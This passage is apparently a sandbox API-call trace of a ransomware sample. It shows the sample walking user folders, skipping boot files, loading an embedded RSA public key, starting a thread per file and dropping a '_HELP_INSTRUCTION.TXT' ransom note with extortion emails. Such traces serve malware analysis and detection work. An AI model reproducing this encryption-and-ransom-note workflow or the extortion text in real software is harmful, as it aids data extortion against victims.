lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.068] RegCloseKey (hKey=0xedc) returned 0x0 [0207.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.068] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.068] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.068] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.068] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.068] PathFindFileNameW (pszPath="C:\\Users\\Default\\Saved Games") returned="Saved Games" [0207.068] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0207.068] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0207.068] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0207.068] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0207.068] SetErrorMode (uMode=0x1) returned 0x1 [0207.068] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0207.068] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0207.069] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0207.069] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Searches\\*.*") returned="C:\\Users\\Default\\Searches\\*.*" [0207.069] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.069] PathFindFileNameW (pszPath="C:\\Users\\Default\\Searches") returned="Searches" [0207.069] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0207.069] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.069] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0207.069] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0207.070] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0207.070] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0207.070] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0207.070] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Searches\\") [0207.070] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.070] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.070] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xee4 [0207.070] Sleep (dwMilliseconds=0x96) [0207.220] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0207.220] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0207.220] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0207.220] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.220] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntldr") returned 0x0 [0207.220] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTLDR") returned 0x0 [0207.220] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0207.220] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntdetect.com") returned 0x0 [0207.220] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0207.220] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Searches\\") [0207.221] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.221] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0207.221] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xee8 [0207.221] Sleep (dwMilliseconds=0x96) [0207.376] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0207.376] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0207.376] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0207.376] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.376] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntldr") returned 0x0 [0207.376] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTLDR") returned 0x0 [0207.376] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0207.376] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntdetect.com") returned 0x0 [0207.376] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0207.376] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Searches\\") [0207.377] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.377] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0207.377] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xeec [0207.377] Sleep (dwMilliseconds=0x96) [0207.532] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0207.532] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0207.533] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0207.533] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0207.533] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Searches\\*.*") returned="C:\\Users\\Default\\Searches\\*.*" [0207.533] SetErrorMode (uMode=0x1) returned 0x1 [0207.533] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT") returned 47 [0207.533] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.534] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.534] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xef0) returned 0x0 [0207.534] RegQueryValueExW (in: hKey=0xef0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4380a68, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4380a68*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.534] RegCloseKey (hKey=0xef0) returned 0x0 [0207.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.534] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.534] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\searches\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.535] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\searches\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.537] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.537] PathFindFileNameW (pszPath="C:\\Users\\Default\\Searches") returned="Searches" [0207.537] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0207.538] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0207.538] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0207.538] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0207.538] SetErrorMode (uMode=0x1) returned 0x1 [0207.538] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0207.538] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0207.538] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\SendTo\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0207.538] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*" [0207.538] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.538] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.539] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0207.539] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*" [0207.539] SetErrorMode (uMode=0x1) returned 0x1 [0207.539] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT") returned 45 [0207.539] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.539] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.539] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xef4) returned 0x0 [0207.539] RegQueryValueExW (in: hKey=0xef4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4380c98, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4380c98*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.539] RegCloseKey (hKey=0xef4) returned 0x0 [0207.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.539] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.539] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.540] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.542] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.542] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.542] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.542] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0207.542] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0207.542] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0207.542] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0207.542] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0207.543] SetErrorMode (uMode=0x1) returned 0x1 [0207.543] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0207.543] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0207.543] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Start Menu\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0207.543] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*" [0207.543] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.543] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.543] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0207.543] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*" [0207.543] SetErrorMode (uMode=0x1) returned 0x1 [0207.543] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT") returned 49 [0207.543] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.543] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.544] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xef4) returned 0x0 [0207.544] RegQueryValueExW (in: hKey=0xef4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4380ec8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4380ec8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.544] RegCloseKey (hKey=0xef4) returned 0x0 [0207.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.544] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.544] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.544] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.544] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.544] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.544] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.545] lstrcmpW 